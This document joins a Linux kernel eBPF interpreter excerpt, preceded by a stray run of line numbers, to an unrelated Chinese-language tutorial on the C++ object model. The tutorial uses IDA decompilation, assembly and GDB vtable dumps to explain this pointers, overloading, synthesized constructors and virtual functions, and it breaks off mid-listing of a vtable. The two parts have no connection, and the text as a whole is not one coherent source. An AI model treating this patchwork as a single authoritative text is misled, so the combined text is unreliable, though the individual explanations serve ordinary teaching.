182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
/*
 * eBPF interpreter loop.
 *
 * Starting at @insn, each instruction is dispatched through a 256-entry
 * computed-goto table indexed by insn->code. Every handler ends with CONT
 * (or CONT_JMP), which advances insn by one and dispatches again. The loop
 * ends at JMP_EXIT, which returns BPF_R0. An opcode without a handler lands
 * on default_label, which logs a warning and hits BUG_ON().
 *
 * DST, SRC, IMM, AX and BPF_R0..BPF_R5 are macros defined outside this
 * excerpt (presumably views onto @regs and the current instruction - confirm
 * against the surrounding file). @stack is not referenced directly in the
 * body shown here.
 */
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn, u64 *stack)
{
#define BPF_INSN_2_LBL(x, y) [BPF_##x | BPF_##y] = &&x##_##y
#define BPF_INSN_3_LBL(x, y, z) [BPF_##x | BPF_##y | BPF_##z] = &&x##_##y##_##z
static const void * const jumptable[256] __annotate_jump_table = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
BPF_INSN_MAP(BPF_INSN_2_LBL, BPF_INSN_3_LBL),
/* Non-UAPI available opcodes. */
[BPF_JMP | BPF_CALL_ARGS] = &&JMP_CALL_ARGS,
[BPF_JMP | BPF_TAIL_CALL] = &&JMP_TAIL_CALL,
[BPF_LDX | BPF_PROBE_MEM | BPF_B] = &&LDX_PROBE_MEM_B,
[BPF_LDX | BPF_PROBE_MEM | BPF_H] = &&LDX_PROBE_MEM_H,
[BPF_LDX | BPF_PROBE_MEM | BPF_W] = &&LDX_PROBE_MEM_W,
[BPF_LDX | BPF_PROBE_MEM | BPF_DW] = &&LDX_PROBE_MEM_DW,
}; /* jump table: one label address per opcode byte, used for dispatch below */
#undef BPF_INSN_3_LBL
#undef BPF_INSN_2_LBL
u32 tail_call_cnt = 0;

/* Both macros step to the next instruction and re-enter the dispatcher. */
#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
ALU64_##OPCODE##_X: \
DST = DST OP SRC; \
CONT; \
ALU_##OPCODE##_X: \
DST = (u32) DST OP (u32) SRC; \
CONT; \
ALU64_##OPCODE##_K: \
DST = DST OP IMM; \
CONT; \
ALU_##OPCODE##_K: \
DST = (u32) DST OP (u32) IMM; \
CONT;

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
ALU_NEG:
DST = (u32) -DST;
CONT;
ALU64_NEG:
DST = -DST;
CONT;
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
/* 64-bit immediate load: the value is split across two consecutive
 * instruction slots, so the extra insn++ skips the second slot.
 */
LD_IMM_DW:
DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
insn++;
CONT;
ALU_ARSH_X:
DST = (u64) (u32) (((s32) DST) >> SRC);
CONT;
ALU_ARSH_K:
DST = (u64) (u32) (((s32) DST) >> IMM);
CONT;
ALU64_ARSH_X:
(*(s64 *) &DST) >>= SRC;
CONT;
ALU64_ARSH_K:
(*(s64 *) &DST) >>= IMM;
CONT;
ALU64_MOD_X:
div64_u64_rem(DST, SRC, &AX);
DST = AX;
CONT;
ALU_MOD_X:
AX = (u32) DST;
DST = do_div(AX, (u32) SRC);
CONT;
ALU64_MOD_K:
div64_u64_rem(DST, IMM, &AX);
DST = AX;
CONT;
ALU_MOD_K:
AX = (u32) DST;
DST = do_div(AX, (u32) IMM);
CONT;
ALU64_DIV_X:
DST = div64_u64(DST, SRC);
CONT;
ALU_DIV_X:
AX = (u32) DST;
do_div(AX, (u32) SRC);
DST = (u32) AX;
CONT;
ALU64_DIV_K:
DST = div64_u64(DST, IMM);
CONT;
ALU_DIV_K:
AX = (u32) DST;
do_div(AX, (u32) IMM);
DST = (u32) AX;
CONT;
/* Endianness conversions; IMM selects the operand width (16/32/64). */
ALU_END_TO_BE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_be16(DST);
break;
case 32:
DST = (__force u32) cpu_to_be32(DST);
break;
case 64:
DST = (__force u64) cpu_to_be64(DST);
break;
}
CONT;
ALU_END_TO_LE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_le16(DST);
break;
case 32:
DST = (__force u32) cpu_to_le32(DST);
break;
case 64:
DST = (__force u64) cpu_to_le64(DST);
break;
}
CONT;

/* CALL */
JMP_CALL:
/* Function call scratches BPF_R1-BPF_R5 registers,
* preserves BPF_R6-BPF_R9, and stores return value
* into BPF_R0.
*/
BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
BPF_R4, BPF_R5);
CONT;

/* Same as JMP_CALL, but the callee also receives a pointer to the
 * instruction at insn + insn->off + 1 as a sixth argument.
 */
JMP_CALL_ARGS:
BPF_R0 = (__bpf_call_base_args + insn->imm)(BPF_R1, BPF_R2,
BPF_R3, BPF_R4,
BPF_R5,
insn + insn->off + 1);
CONT;

/* Tail call: BPF_R2 carries the map pointer and BPF_R3 the index. On any
 * failed check (index out of range, tail-call budget exceeded, empty slot)
 * execution simply continues with the next instruction.
 */
JMP_TAIL_CALL: {
struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
struct bpf_array *array = container_of(map, struct bpf_array, map);
struct bpf_prog *prog;
u32 index = BPF_R3;

if (unlikely(index >= array->map.max_entries))
goto out;
if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
goto out;

tail_call_cnt++;

prog = READ_ONCE(array->ptrs[index]);
if (!prog)
goto out;

/* ARG1 at this point is guaranteed to point to CTX from
* the verifier side due to the fact that the tail call is
* handled like a helper, that is, bpf_tail_call_proto,
* where arg1_type is ARG_PTR_TO_CTX.
*/
insn = prog->insnsi;
goto select_insn;
out:
CONT;
}
/* Unconditional jump: insn->off is relative; CONT adds the final +1. */
JMP_JA:
insn += insn->off;
CONT;
JMP_EXIT:
return BPF_R0;
/* JMP */
#define COND_JMP(SIGN, OPCODE, CMP_OP) \
JMP_##OPCODE##_X: \
if ((SIGN##64) DST CMP_OP (SIGN##64) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_X: \
if ((SIGN##32) DST CMP_OP (SIGN##32) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP_##OPCODE##_K: \
if ((SIGN##64) DST CMP_OP (SIGN##64) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_K: \
if ((SIGN##32) DST CMP_OP (SIGN##32) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT;
COND_JMP(u, JEQ, ==)
COND_JMP(u, JNE, !=)
COND_JMP(u, JGT, >)
COND_JMP(u, JLT, <)
COND_JMP(u, JGE, >=)
COND_JMP(u, JLE, <=)
COND_JMP(u, JSET, &)
COND_JMP(s, JSGT, >)
COND_JMP(s, JSLT, <)
COND_JMP(s, JSGE, >=)
COND_JMP(s, JSLE, <=)
#undef COND_JMP
/* STX and ST and LDX*/
#define LDST(SIZEOP, SIZE) \
STX_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = SRC; \
CONT; \
ST_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = IMM; \
CONT; \
LDX_MEM_##SIZEOP: \
DST = *(SIZE *)(unsigned long) (SRC + insn->off); \
CONT;

LDST(B, u8)
LDST(H, u16)
LDST(W, u32)
LDST(DW, u64)
#undef LDST
/* Probe loads go through bpf_probe_read_kernel() instead of a direct
 * dereference; its return value is ignored here.
 */
#define LDX_PROBE(SIZEOP, SIZE) \
LDX_PROBE_MEM_##SIZEOP: \
bpf_probe_read_kernel(&DST, SIZE, (const void *)(long) (SRC + insn->off)); \
CONT;
LDX_PROBE(B, 1)
LDX_PROBE(H, 2)
LDX_PROBE(W, 4)
LDX_PROBE(DW, 8)
#undef LDX_PROBE

STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
atomic_add((u32) SRC, (atomic_t *)(unsigned long)
(DST + insn->off));
CONT;
STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
(DST + insn->off));
CONT;

default_label:
/* If we ever reach this, we have a bug somewhere. Die hard here
* instead of just returning 0; we could be somewhere in a subprog,
* so execution could continue otherwise which we do /not/ want.
*
* Note, verifier whitelists all opcodes in bpf_opcode_in_insntable().
*/
pr_warn("BPF interpreter: unknown opcode %02x\n", insn->code);
BUG_ON(1);
return 0;
}

cpp 对象

C++ 的每一个成员函数在 class 中声明,但是却不出现在每个对象中:

  • 每一个非内联的成员函数,只会诞生一个函数实例
  • 每个内联函数,会在其每一个使用者身上产生一个函数实例

C++ 的类就相当于一个数据结构体加上多个函数:

1
Class = data structure + code (methods)

This 指针

This 指针就是指向实例对象自己的指针

案例一:This 的使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include<iostream>
#include<string.h>
using namespace std;

// Base owns the data member and a printer; A and B below reuse both through inheritance.
class Base{
public:
// Prints the current contents of name followed by a newline.
void fun(){
cout<<name<<endl;
}
char name[8];
};

// A::foo stores "A" in the inherited buffer and prints it.
class A : public Base{
public:
void foo(){
strcpy(this->name,"A");
this->fun(); // same as calling fun() directly; this-> is implicit inside a member
}
};

// B::foo mirrors A::foo with the string "B".
class B : public Base{
public:
void foo(){
strcpy(this->name,"B");
this->fun();
}
};

// Heap-allocates one A and one B and calls foo() on each (the objects are never deleted).
int main(void){
A *a = new A();
B *b = new B();
a->foo();
b->foo();
}
  • 在调用类函数时,会将其 new 出来的堆内存当做第一个参数传入(相当于传入了该对象的数据结构体)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rax
B *v4; // rax
A *a; // [rsp+0h] [rbp-10h]
B *b; // [rsp+8h] [rbp-8h]

v3 = (A *)operator new(8uLL);
*v3 = 0LL;
a = v3;
v4 = (B *)operator new(8uLL);
*v4 = 0LL;
b = v4;
A::foo(a);
B::foo(b);
return 0;
}
  • 使用 This 指针,可以快速操控本实例对象的各个成员:
1
2
3
4
5
void __cdecl A::foo(A *const this)
{
*(_WORD *)this->name = 65; // 编译器优化了
Base::fun(this);
}

重载

C++ 允许在同一作用域中的某个函数和运算符指定多个定义,分别称为:

  • 函数重载
  • 运算符重载

函数重载:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <iostream>
using namespace std;

// Two member functions share the name print and differ only in parameter type.
class Test{
public:
// Overload taking an int.
void print(int i) {
cout<<"int:"<<i<<endl;
}
// Overload taking a double.
void print(double f) {
cout<<"double:"<<f<<endl;
}
};

// Calls print once with an int literal and once with a double literal.
int main(void)
{
Test *t = new Test;
t->print(1);
t->print(1.1);
}
  • 对于类函数来说,编译器会按照名称修饰(name mangling)规则,把 [类名称,函数名称,参数列表] 编码进符号名(例如 _ZN4Test5printEi 就表示 Test::print(int)),并用这个修饰后的名称来当做函数的名称:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

f= qword ptr -18h
t= qword ptr -8

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 20h
mov edi, 1 ; unsigned __int64
call __Znwm ; operator new(ulong)
mov [rbp+t], rax
mov rax, [rbp+t]
mov esi, 1 ; i
mov rdi, rax ; this
call _ZN4Test5printEi ; Test::print(int)
mov rdx, cs:qword_2018
mov rax, [rbp+t]
mov [rbp+f], rdx
movsd xmm0, [rbp+f] ; f
mov rdi, rax ; this
call _ZN4Test5printEd ; Test::print(double)
mov eax, 0
leave
retn
; } // starts at 11BA
main endp
  • 在汇编代码中,程序调用的函数已经确定
  • 也就是说,编译器在编译期进行重载决议(overload resolution)时,就已经根据实参类型确定了应该调用的函数

运算符重载(内部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <iostream>
using namespace std;

// Box with three public dimensions and a member operator+.
class Box
{
public:
// Returns length * breadth * height.
double getVolume(void){
return length * breadth * height;
}
// Sets all three dimensions at once.
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
Box operator + (const Box& b){ /* overloads '+' (selected only when both operands of '+' are Box) */
Box box;
box.length = this->length + b.length;
box.breadth = this->breadth + b.breadth;
box.height = this->height + b.height;
return box;
}
double length;
double breadth;
double height;
};

// Builds two boxes, adds them with the overloaded '+', and reads the volumes.
int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2; // resolves to Box1.operator+(Box2)
volume = Box3.getVolume();

return 0;
}
  • 在一个类中重载运算符过后,其作用范围为整个文件,以及引入该类的其他文件
  • 本质上重载运算符就是调用对应的函数(其参数和返回值必须符合条件)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
Box::operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl Box::operator+(Box *retstr, Box *const this, const Box *b)
{
retstr->length = b->length + this->length;
retstr->breadth = b->breadth + this->breadth;
retstr->height = b->height + this->height;
return retstr;
}
  • PS:Cpp 库中也有许多运算符重载的案例:new、<<、>>

运算符重载(外部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
using namespace std;

// Same Box as in the previous sample, but without a member operator+.
class Box
{
public:
// Returns length * breadth * height.
double getVolume(void){
return length * breadth * height;
}
// Sets all three dimensions at once.
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
double length;
double breadth;
double height;
};

// Free-function overload of '+': both operands arrive as explicit parameters.
Box operator + (const Box& a,const Box& b){
Box box;
box.length = a.length + b.length;
box.breadth = a.breadth + b.breadth;
box.height = a.height + b.height;
return box;
}

// Builds two boxes, adds them with the free operator+, and reads the volumes.
int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2; // resolves to operator+(Box1, Box2)
volume = Box3.getVolume();

return 0;
}
  • 在全局重载运算符过后,其作用范围就是全局(但可以被命名空间限制)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl operator+(Box *retstr, const Box *a, const Box *b)
{
retstr->length = b->length + a->length;
retstr->breadth = b->breadth + a->breadth;
retstr->height = b->height + a->height;
return retstr;
}

内联函数

在类的声明内部声明和定义的函数叫做内联成员函数

  • 内联函数类似于宏函数,但内联函数是在编译阶段由编译器展开,而宏是在预处理阶段展开
  • 内联函数的定义和使用必须在同一文件,因此最好将内联函数定义放在头文件中

定义在类中的成员函数默认都是内联的,类外定义则要加上 inline(类的成员函数是指那些把定义和原型写在类定义内部的函数)

1
2
3
4
5
6
7
// Shows the three ways a member function can be declared with respect to inlining.
class Test{
public:
void setA(int _a); // ordinary member: declared here, defined elsewhere
void setB(int _b){b = _b;} // implicitly inline: defined inside the class body
inline void setC(int _c); // explicitly inline: marked with the inline keyword
int a,b,c;
};
  • 在 IDA 中分析或者在 GDB 中调试,都发现函数没有内联成功(还是当成普通函数来调用):inline 只是对编译器的建议,在没有开启优化(例如 -O0)时编译器通常不会真正进行内联

构造函数

以下几种情况下,会合成有用的构造函数:

  • 带有默认构造函数的成员对象(例如:string 类)
  • 一个派生类的父类带有构造函数(或者父类的成员对象带有默认构造函数),那么子类:
    • 如果没有定义构造函数,则会合成默认构造函数
    • 如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数
  • 带有一个虚函数的类
    • 类声明(或继承)一个虚函数
    • 类派生自一个继承串链,其中有一个或更多的虚基类

案例一:带有默认构造函数的成员对象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <iostream>  
#include <string>

using namespace std;

// Test declares no constructor of its own; its only member is a std::string.
class Test
{
public:
string name;
};

// Creating t on the stack is the only statement of interest here.
int main(int argc, char* argv[])
{
Test t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test t; // [rsp+10h] [rbp-40h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-18h]

v5 = __readfsqword(0x28u);
Test::Test(&t);
Test::~Test(&t);
return 0;
}
  • 由于 Test 类中的 string 类带有默认构造函数,因此 Test 类会合成一个构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
std::string::basic_string(this);
}

案例二:没有定义构造函数,则会合成默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>  
#include <string>

using namespace std;

// Base class with a user-declared default constructor (defined below).
class Test1{
public:
Test1();
};

// Derived class that declares no constructor at all.
class Test2 : public Test1{

};

// Prints "Test1" so the base-constructor call is visible at runtime.
Test1::Test1(void){
cout << "Test1" << endl;
}

// Constructing a Test2 is the only statement of interest here.
int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于 Test2 没有构造函数,但父类 Test1 有构造函数,因此在 Test2 的构造函数中会调用 Test1 的构造函数:
1
2
3
4
void __cdecl Test2::Test2(Test2 *const this)
{
Test1::Test1(this);
}

案例三:如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>  
#include <string>

using namespace std;

// Base class with a user-declared default constructor (defined below).
class Test1{
public:
Test1();
};

// Derived class with its own constructor, which does not mention Test1 explicitly.
class Test2 : public Test1{
public:
Test2();
};

// Prints "Test1" so the base-constructor call is visible at runtime.
Test1::Test1(void){
cout << "Test1" << endl;
}

// Prints "Test2"; there is no explicit base initializer in this definition.
Test2::Test2(void){
cout << "Test2" << endl;
}

// Constructing a Test2 is the only statement of interest here.
int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于在 Test2 的构造函数中没有显式调用父类 Test1 的构造函数,因此编译器会自动在 Test2 的构造函数开头插入对 Test1 默认构造函数的调用:
1
2
3
4
5
6
7
8
void __cdecl Test2::Test2(Test2 *const this)
{
__int64 v1; // rax

Test1::Test1(this);
v1 = std::operator<<<std::char_traits<char>>(&std::cout, "Test2");
std::ostream::operator<<(v1, &std::endl<char,std::char_traits<char>>);
}

案例四:带有一个虚函数的类

  • 源代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<iostream>
using namespace std;

// Class whose only member is a virtual function; it declares no constructor.
class Test{
public:
virtual void foo(){
cout<<"Test::foo() is called"<<endl;
}
};

// Heap-allocates a Test and calls the virtual function through the pointer.
int main(void){
Test *t = new Test();
t->foo();
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test *v3; // rbx

v3 = (Test *)operator new(8uLL);
v3->_vptr_Test = 0LL;
Test::Test(v3);
(*v3->_vptr_Test)(v3, argv);
return 0;
}
  • 由于 Test 中有虚函数,因此编译器会自动为其生成构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
this->_vptr_Test = (int (**)(...))&off_3D70;
}

虚函数

面向对象的语言有三大特性:继承、封装、多态,虚函数就是 cpp 实现多态的方式

  • 多态:指用相同的接口去表示不同的实现

案例一:使用虚函数实现多态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include<iostream>
using namespace std;

// Base declares foo() virtual; A, B and C each override it with their own message.
class Base{
public:
virtual void foo(){
cout<<"Base::foo() is called"<<endl;
}
};

class A:public Base{
public:
void foo(){
cout<<"A::foo() is called"<<endl;
}
};

class B:public Base{
public:
void foo(){
cout<<"B::foo() is called"<<endl;
}
};

// C is declared for completeness; main() below never instantiates it.
class C:public Base{
public:
void foo(){
cout<<"C::foo() is called"<<endl;
}
};

// The object is a B accessed through a Base*, so both calls go through the object's vptr.
// NOTE(review): the object is really a B, so viewing it as an A* is formally
// undefined behaviour; it is done here only to show that the pointer type does
// not choose the virtual target.
int main(void){
Base *a = new B();
a->foo(); // B::foo() is called
((A *)a)->foo(); // B::foo() is called
return 0;
}
  • 当使用类的指针调用成员函数时:
    • 普通函数由指针类型决定
    • 虚函数由指针指向的实际类型决定
1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
B *v3; // rbx

v3 = (B *)operator new(8uLL);
v3->_vptr_Base = 0LL;
B::B(v3);
(*v3->_vptr_Base)(v3, argv);
(*v3->_vptr_Base)(v3);
return 0;
}
  • 这个 _vptr_Base 就是虚指针基址,它将会在对应的构造函数中进行初始化
1
2
3
4
5
void __cdecl B::B(B *const this)
{
Base::Base(this);
this->_vptr_Base = (int (**)(...))&off_3D40;
}
1
2
.data.rel.ro:0000000000003D40 8C 12 00 00 00 00 00 00       off_3D40 dq offset _ZN1B3fooEv          ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003D40 ; B::foo(void)

对于拥有虚函数的类,其每个对象均具有一个指向本类虚函数表的指针 _vptr_Base(可以将其理解为指向“虚函数指针数组”的指针)

案例二:虚函数的调用与虚表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include<iostream>
using namespace std;

// Five virtual functions declared in order foo1..foo5; each prints its own name.
class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
virtual void foo4(){
cout<<"Base::foo4() is called"<<endl;
}
virtual void foo5(){
cout<<"Base::foo5() is called"<<endl;
}
};

// Calls every virtual function once, in declaration order, through a Base*.
int main(void){
Base *a = new Base();
a->foo1();
a->foo2();
a->foo3();
a->foo4();
a->foo5();
}
  • cpp 底层处理虚表的方式就是强转并调用 _vptr_Base + offset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
Base *v3; // rbx
Base *a; // [rsp+8h] [rbp-18h]

v3 = (Base *)operator new(8uLL);
v3->_vptr_Base = 0LL;
Base::Base(v3);
a = v3;
(*v3->_vptr_Base)(v3, argv);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 2))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 4))(a);
return 0;
}
  • 再看一个去符号的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
__int64 __fastcall main(int a1, char **a2, char **a3)
{
_QWORD *v3; // rbx
_QWORD *v5; // [rsp+8h] [rbp-18h]

v3 = (_QWORD *)operator new(8uLL);
*v3 = 0LL;
sub_13B4(v3, a2);
v5 = v3;
(*(void (__fastcall **)(_QWORD *))*v3)(v3);
(*(void (__fastcall **)(_QWORD *))(*v5 + 8LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 16LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 24LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 32LL))(v5);
return 0LL;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
5
6
.data.rel.ro:0000000000003D50 9C 12 00 00 00 00 00 00       off_3D50 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D50 ; Base::foo1(void)
.data.rel.ro:0000000000003D58 D4 12 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D60 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D68 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo4Ev ; Base::foo4(void)
.data.rel.ro:0000000000003D70 7C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo5Ev ; Base::foo5(void)
  • 用 GDB 进行调试:
1
2
3
4
5
6
pwndbg> telescope 0x55883ca88000+0x3D50
00:0000│ rdx 0x55883ca8bd50 —▸ 0x55883ca8929c (Base::foo1()) ◂— push rbp
01:0008│     0x55883ca8bd58 —▸ 0x55883ca892d4 (Base::foo2()) ◂— push rbp
02:0010│     0x55883ca8bd60 —▸ 0x55883ca8930c (Base::foo3()) ◂— push rbp
03:0018│     0x55883ca8bd68 —▸ 0x55883ca89344 (Base::foo4()) ◂— push rbp
04:0020│     0x55883ca8bd70 —▸ 0x55883ca8937c (Base::foo5()) ◂— push rbp

案例三:虚函数的继承

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include<iostream>
using namespace std;

// Base contributes three virtual functions (foo1..foo3).
class Base{
public:
    virtual void foo1(){
        cout<<"Base::foo1() is called"<<endl;
    }
    virtual void foo2(){
        cout<<"Base::foo2() is called"<<endl;
    }
    virtual void foo3(){
        cout<<"Base::foo3() is called"<<endl;
    }
};

// A inherits Base's virtuals and adds two of its own.
// Each message now names the function that actually runs; previously all four
// derived functions printed the copy-pasted text "Base::fooa() is called".
class A : public Base{
public:
    virtual void fooa(){
        cout<<"A::fooa() is called"<<endl;
    }
    virtual void foob(){
        cout<<"A::foob() is called"<<endl;
    }
};

// B has the same shape as A, with its own fooa/foob.
class B : public Base{
public:
    virtual void fooa(){
        cout<<"B::fooa() is called"<<endl;
    }
    virtual void foob(){
        cout<<"B::foob() is called"<<endl;
    }
};

// Calls two inherited virtuals on a, then the added virtuals on b and on a.
int main(void){
    A *a = new A();
    B *b = new B();
    a->foo1();
    a->foo2();
    b->fooa();
    b->foob();
    a->fooa();
    a->foob();
}
  • 当一个类继承带有虚函数的类时,它的虚表会先包含父类虚表中的各项(被重写的项会替换为子类的实现),然后把自己新增的虚函数追加到后面:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rbx
B *v4; // rbx
A *a; // [rsp+0h] [rbp-20h]
B *b; // [rsp+8h] [rbp-18h]

v3 = (A *)operator new(8uLL);
v3->_vptr_Base = 0LL;
A::A(v3);
a = v3;
v4 = (B *)operator new(8uLL);
v4->_vptr_Base = 0LL;
B::B(v4);
b = v4;
(*a->_vptr_Base)(a, argv);
(*((void (__fastcall **)(A *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(B *))b->_vptr_Base + 3))(b);
(*((void (__fastcall **)(B *))b->_vptr_Base + 4))(b);
(*((void (__fastcall **)(A *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(A *))a->_vptr_Base + 4))(a);
return 0;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
.data.rel.ro:0000000000003D30 D4 12 00 00 00 00 00 00       off_3D30 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D30 ; Base::foo1(void)
.data.rel.ro:0000000000003D38 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D40 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CF8 D4 12 00 00 00 00 00 00       off_3CF8 dq offset _ZN4Base4foo1Ev      ; DATA XREF: A::A(void)+18↑o
